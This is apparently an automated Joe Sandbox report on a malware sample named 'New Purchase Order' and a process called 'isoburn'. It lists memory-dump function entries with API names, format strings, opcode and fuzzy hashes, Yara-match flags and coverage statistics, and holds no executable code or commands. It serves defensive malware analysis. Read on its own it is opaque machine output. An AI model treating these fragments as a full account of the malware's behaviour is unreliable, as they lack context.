                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 43cedac7ffac78ece00f62e6b0f607f4634389c7b7deb5744068007fae6222ba
                                                          • Instruction ID: 0eeb764e23adb31f8df3f27169cb33e5edba45e13c467d86724a6b513537d993
                                                          • Opcode Fuzzy Hash: 43cedac7ffac78ece00f62e6b0f607f4634389c7b7deb5744068007fae6222ba
                                                          • Instruction Fuzzy Hash: 56900221346445535645B19844045078006A7E0241795C022A1414960CC7669A56D722
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1bf8fd0c6745844e8d56b2ef3a140511e440b06dae1f44a6f3b622f2321f82b
                                                          • Instruction ID: b803a1720fef86634fc99d308e11a915e55cf029862ddeb57aa2e1a8b2422dab
                                                          • Opcode Fuzzy Hash: e1bf8fd0c6745844e8d56b2ef3a140511e440b06dae1f44a6f3b622f2321f82b
                                                          • Instruction Fuzzy Hash: 0790023134540803D241719844046064009A7D0241F95C022A0424564EC7958B56AB62
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 066c8f22bbc4baea0bb3b3ec86f7453022dd7d4577e09d32753768db8dfc27b3
                                                          • Instruction ID: d76a1a8da3c719f67c8f6e1b3e4b86ff13c981ae0d736e18793479f27831e899
                                                          • Opcode Fuzzy Hash: 066c8f22bbc4baea0bb3b3ec86f7453022dd7d4577e09d32753768db8dfc27b3
                                                          • Instruction Fuzzy Hash: AA90023130540C43D20071984404B46400597E0301F55C026A0124664DC755CA517622
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1bc58cb3150a27fca3051bde13f70cd2acead8c957c9f384748767d6e28ff943
                                                          • Instruction ID: 0d141389eadc913e4e0f9c0bc6235d7e5f7638cbb11b49a3ed63dfda429c22c8
                                                          • Opcode Fuzzy Hash: 1bc58cb3150a27fca3051bde13f70cd2acead8c957c9f384748767d6e28ff943
                                                          • Instruction Fuzzy Hash: EE90023130540803D20071985508707400597D0201F55D421A0424568DD7968A516222
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b702442ed5c13137595527b5bf22f13d9f4f49e0ef3dc9554fce9ae552e7f798
                                                          • Instruction ID: 9f45c914eaae3bb91d335adc468eed69ae7cc6069cdc7e3fda4e55ff87063507
                                                          • Opcode Fuzzy Hash: b702442ed5c13137595527b5bf22f13d9f4f49e0ef3dc9554fce9ae552e7f798
                                                          • Instruction Fuzzy Hash: F490022170940803D24071985418706401597D0201F55D021A0024564DC7998B5567A2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 469c2a0cbd00e589495a16c66909cbb5806a13ff1443677b26ebd6d3bfc2e2a6
                                                          • Instruction ID: e8cf37417e27529ae8ccfd2439a8d6de6100c2c114baaa393dd8fcd83468a6d6
                                                          • Opcode Fuzzy Hash: 469c2a0cbd00e589495a16c66909cbb5806a13ff1443677b26ebd6d3bfc2e2a6
                                                          • Instruction Fuzzy Hash: C190023130540803D20075D85408646400597E0301F55D021A5024565EC7A58A916232
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: de894b348065f53fbcefb21d01e061253cb557ba8caeb3545d987f253463647b
                                                          • Instruction ID: 800a3a6db390d63e7dc68dbaedeffff0ec81f123a197ee87a42785880f46aaa9
                                                          • Opcode Fuzzy Hash: de894b348065f53fbcefb21d01e061253cb557ba8caeb3545d987f253463647b
                                                          • Instruction Fuzzy Hash: 5351D6B6A00156BFDB11DF9C8C909BEFBB8BB882407148269F565E7647D734DE408BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 157b9dc095430a5ff4c791e3294f3a26b30fe20a8e78c77b0a1fb278028234b7
                                                          • Instruction ID: b6379ad8e97c1cd207f514ce8f07b59e60b90a74dc772aff0ac3331935a74a9a
                                                          • Opcode Fuzzy Hash: 157b9dc095430a5ff4c791e3294f3a26b30fe20a8e78c77b0a1fb278028234b7
                                                          • Instruction Fuzzy Hash: 1E51F671A04645AFCB30DF5CCC9097FF7F9EB84200B948599E5D6C7642E674DE008760
                                                          Strings
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017646FC
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01764787
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01764742
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01764725
                                                          • ExecuteOptions, xrefs: 017646A0
                                                          • Execute=1, xrefs: 01764713
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01764655
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 2158142b80671288d29040f5da06b1323456a40f4a03a15e320a6e6450c2695f
                                                          • Instruction ID: e96d767a8b899907ae2f00463144b6b81c3558902b63ad021ea2d5a86a67b199
                                                          • Opcode Fuzzy Hash: 2158142b80671288d29040f5da06b1323456a40f4a03a15e320a6e6450c2695f
                                                          • Instruction Fuzzy Hash: 8F511E31A0022A7AEF25EB69DD89FBDF7A8EF25300F1400DDD606A7191D7719E468F50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: 9d5b9c08e7ab78790076128a947d3fd3bbc88ec4af0ab4bfc323abb46e3c7724
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: DA819070E452499EEF2A8E6CC8917FEFBB1EFC5320F18415AD861A7293C7349941CB51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: f815842fa241b165fb7670df7c73732aec7a8bc46ce50225876310a6e97466a6
                                                          • Instruction ID: 9c7dd1e33ed6470ebf0298abc2c1e9875fb0bd6c4ea3361beda56c7849235a11
                                                          • Opcode Fuzzy Hash: f815842fa241b165fb7670df7c73732aec7a8bc46ce50225876310a6e97466a6
                                                          • Instruction Fuzzy Hash: B821777AA00119ABDB10DF79CC44AFEFBF9EF94650F540216FA05D3206E730E9018BA1
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017602BD
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017602E7
                                                          • RTL: Re-Waiting, xrefs: 0176031E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: c4c9cda5eaed36cc233a00233c2d971913c2500ae61a85509a62e74212a99185
                                                          • Instruction ID: 72a067fdf0748f04dd052f461e2eba7da2c1580e96c9d3fab8a74008355874f6
                                                          • Opcode Fuzzy Hash: c4c9cda5eaed36cc233a00233c2d971913c2500ae61a85509a62e74212a99185
                                                          • Instruction Fuzzy Hash: CEE18C706087429FD725CF2CC884B2AFBE4AF88324F144A5DF9A58B2E5D774D949CB42
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01767B7F
                                                          • RTL: Resource at %p, xrefs: 01767B8E
                                                          • RTL: Re-Waiting, xrefs: 01767BAC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: b1267258c01e6f5671863b00856478d4a952d2c7c7864fc6d47b58f4e4430d28
                                                          • Instruction ID: fd535d57a396cdd066baea89b0aeb971838cb6d95a89121cef8051a773078004
                                                          • Opcode Fuzzy Hash: b1267258c01e6f5671863b00856478d4a952d2c7c7864fc6d47b58f4e4430d28
                                                          • Instruction Fuzzy Hash: 5041EF317047029FDB24DE29C840F6AF7E5EF98720F000A2DE95A9B680DB31E9068B91
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0176728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01767294
                                                          • RTL: Resource at %p, xrefs: 017672A3
                                                          • RTL: Re-Waiting, xrefs: 017672C1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: e0669ae0fc4342c5d498a1609ee04e4b1339408163674b90f46c54fcbbd362de
                                                          • Instruction ID: b81eaf9de6426153aac1b8bda2aec32b9b42d467eeb327fe84a85009dc145e27
                                                          • Opcode Fuzzy Hash: e0669ae0fc4342c5d498a1609ee04e4b1339408163674b90f46c54fcbbd362de
                                                          • Instruction Fuzzy Hash: AF41FF31608216AFDB24DE29CC81B6AF7A9FB94754F100619FD55AB240DB20F8428BD1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: f2b449105eb23cb2371b2896014cc4d11b08921145cd4b9042ec6ff0149a4951
                                                          • Instruction ID: 9781accff860470a9cf1d571e7afa230418fdc9d9ce384147aa4aa9ff8ff6079
                                                          • Opcode Fuzzy Hash: f2b449105eb23cb2371b2896014cc4d11b08921145cd4b9042ec6ff0149a4951
                                                          • Instruction Fuzzy Hash: 21318672A00219AFDB20DE2DCC44BEFF7F8EF45610F954655E949E3205EB309A448BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: eccb426257b50c79b71b0d95b7a5c690f980828cee2368a6fdd2c2781d9414b7
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 4A91A5B1E4021B9BEF28DF6DC8816BEFBA1BFC4320F54461AE955E72C6D73089418761
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 6eb0c72d872ee0786fe4d3fd3c4a3469cdc5903ffd86f9f3d750487fb02e5f63
                                                          • Instruction ID: ab3f21b2cc8b1335f55c3af588e4b50b6012a5a139f3dd1d1396f36e87f7af54
                                                          • Opcode Fuzzy Hash: 6eb0c72d872ee0786fe4d3fd3c4a3469cdc5903ffd86f9f3d750487fb02e5f63
                                                          • Instruction Fuzzy Hash: DF812A71D00269DBDB31CB54CC44BEEBBB4AB48714F0041EAEA09B7281E7709E84CFA0

                                                          Execution Graph

                                                          Execution Coverage:2.6%
                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                          Signature Coverage:1.6%
                                                          Total number of Nodes:440
                                                          Total number of Limit Nodes:70

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ")$#$#$$u$'$-$-~$.$@k$H$O($T$Z/$[5$]5$f?$pa$r$vj$}$K
                                                          • API String ID: 0-3922967351
                                                          • Opcode ID: 4f5297c37da48b17f1a590391c99fe6f1604f29743330c2930f42081600f4ba1
                                                          • Instruction ID: 8a7e91a9af0a3f7976e6b025c178d514f0f6ec7f14180a3d5802c3cda6bafe16
                                                          • Opcode Fuzzy Hash: 4f5297c37da48b17f1a590391c99fe6f1604f29743330c2930f42081600f4ba1
                                                          • Instruction Fuzzy Hash: 4D229BB0E05229CBEF24CF49C998BDDBBB2BB45348F1081D9C60D6B291D7B55A88CF54
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02FAC5C4
                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02FAC5FF
                                                          • FindClose.KERNELBASE(?), ref: 02FAC60A
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                          • Instruction ID: 461b2231ea1e5ea517aa2ed0749822d6447d0fd6577ebffef8dafc4ae5d89600
                                                          • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                          • Instruction Fuzzy Hash: 3A3185B1900348BBDB21DF64CC95FFB777D9F44788F144559FA08A6180DB70AA848FA0
                                                          APIs
                                                          • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 02FB91A1
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                          • Instruction ID: 5e5752b05df0eef65462177a912e30f70043a56e7b22b1b35355bfd995d8d017
                                                          • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                          • Instruction Fuzzy Hash: 5931D3B5A01608ABDB54DF99D880EEFB7F9AF8C300F108619F918A7340D730A951CFA4
                                                          APIs
                                                          • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 02FB92F6
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                          • Instruction ID: f2d0b6ab1492d9a28d6cf6ef66b5321cd63d5c064adb84f4c45e987717824816
                                                          • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                          • Instruction Fuzzy Hash: AD31D4B5A00609AFDB14DF99D880EEFB7F9AF88714F108219F918A7341D770A911CFA4
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(02FA1CAE,9ACB2CF8,02FB7EAF,00000000,00000004,00003000,?,?,?,?,?,02FB7EAF,02FA1CAE), ref: 02FB95DB
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                          • Instruction ID: 54a683c9ab30c4894ebdab33270b429fcdbba0e9326504b419936048e18542aa
                                                          • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                          • Instruction Fuzzy Hash: B12127B5A00209ABDB10DFA9DC40EEFB7B9EF89300F104619FA18A7241D770A911CFA5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                          • Instruction ID: 770ca8a4fa17b0a5f8466352e5edf4e06aac7d28d615f215411bc4f211550d1d
                                                          • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                          • Instruction Fuzzy Hash: D411E0716016057EE620EB69DC41FEFB3ADEF8A700F10421DFA1867281DB75B9018BA5
                                                          APIs
                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02FB93D4
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                          • Instruction ID: d8363321ddb4e9f743b040bfbb451f22fdf7e7e3ab16493dc0cce16bea4a1c0b
                                                          • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                          • Instruction Fuzzy Hash: 9DE08C362002047BE620EB6ADC41FDB77AEDFCA750F00411AFA0CA7242C671BA108BF0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f912beb0630e3a27243edce0692047aeb992b87c0f8b5840c2d7fb3c921dce6d
                                                          • Instruction ID: 6d60997ae3ae71c25d64f8700993ff8bf8059c98d7ba73a6ce5d5e66fa7023fd
                                                          • Opcode Fuzzy Hash: f912beb0630e3a27243edce0692047aeb992b87c0f8b5840c2d7fb3c921dce6d
                                                          • Instruction Fuzzy Hash: F09002A66115008241407158484440660559BE13013D5C115A5554560C86588D959269
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 509e5bb995f41282db62453d15bb216219ebfceff225c5eb3ed6ec8c6259e7e6
                                                          • Instruction ID: b8190ff6f5982f8321ffa1d430e777e4a966c00e2d88f4ac29b2551f55786c54
                                                          • Opcode Fuzzy Hash: 509e5bb995f41282db62453d15bb216219ebfceff225c5eb3ed6ec8c6259e7e6
                                                          • Instruction Fuzzy Hash: AB9002A621240043410571584454616405A8BE0201B95C021E6014590DC5658DD16125
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 69aabacf7d3e8dfab41d6ed54eddcabb1837d5db9492dba235527a440eab1d07
                                                          • Instruction ID: eb86481f9292a23ff5a470efd08bbfb7eef710da0844070dde5dde6a457d9349
                                                          • Opcode Fuzzy Hash: 69aabacf7d3e8dfab41d6ed54eddcabb1837d5db9492dba235527a440eab1d07
                                                          • Instruction Fuzzy Hash: 9590027661540842D1507158445474600558BD0301F95C011A5024654D87958F9576A1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1b615f28611843a621ae5bc28ffb40f1e6e15cf1726608c5a4df7667ec2905a9
                                                          • Instruction ID: 6cb3cf695a4a51e77736fcd1e8964d7575bbd93c282d62cee3ecf698418ff514
                                                          • Opcode Fuzzy Hash: 1b615f28611843a621ae5bc28ffb40f1e6e15cf1726608c5a4df7667ec2905a9
                                                          • Instruction Fuzzy Hash: 8B90027621544882D14071584444A4600658BD0305F95C011A5064694D96658E95B661
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 686a82e3c11c076053404c90c0ba8df0e5529120c16346830b6ac76891c3307b
